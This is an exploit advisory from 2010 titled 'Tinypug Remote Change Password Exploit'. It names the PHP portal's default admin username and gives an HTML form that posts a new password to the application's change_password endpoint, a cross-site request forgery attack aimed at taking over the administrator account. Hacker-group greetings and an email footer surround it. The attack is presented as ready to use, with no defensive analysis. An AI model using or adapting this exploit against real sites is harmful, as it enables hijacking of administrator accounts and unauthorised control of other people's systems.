tinypug-xsrf.txt
Posted on 24 February 2010
============================================================================== [»] ~ Note : [ Default Username Of Admin : Administrator ] ============================================================================== [»] Tinypug Remote Change Password Exploit ============================================================================== [»] Script: [ Tinypug ] [»] Language: [ PHP ] [»] Site page: [ Tinypug is a system for building portals that enable innovation communities and customer inquiry. ] [»] Download: [ http://code.google.com/p/tinypug/ ] [»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ] [»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.com ] [»] My Home: [ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploit ]=== <html> <head> <title>Tinypug Remote Change Admin Password Exploit [By:MvM]</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body> <form action="http://tinypug.com/profiles/change_password" method="post" id="the_form"> <div class='frmrow'> <label for="password">New Password: </label> <input type="password" name="password" value="" /> </div> <div class='frmrow'> <label for="password2">Enter Again To Confirm: </label> <input type="password" name="password2" value="" /> </div> <div class='frmsubmit'> <input type="submit" name="submit" value="Change Password" /></div> </form> </body> </html> Author: ViRuSMaN <- ########################################################################### ________________________________ Hotmail: Powerful Free email with security by Microsoft. Get it now.<https://signup.live.com/signup.aspx?id=60969>
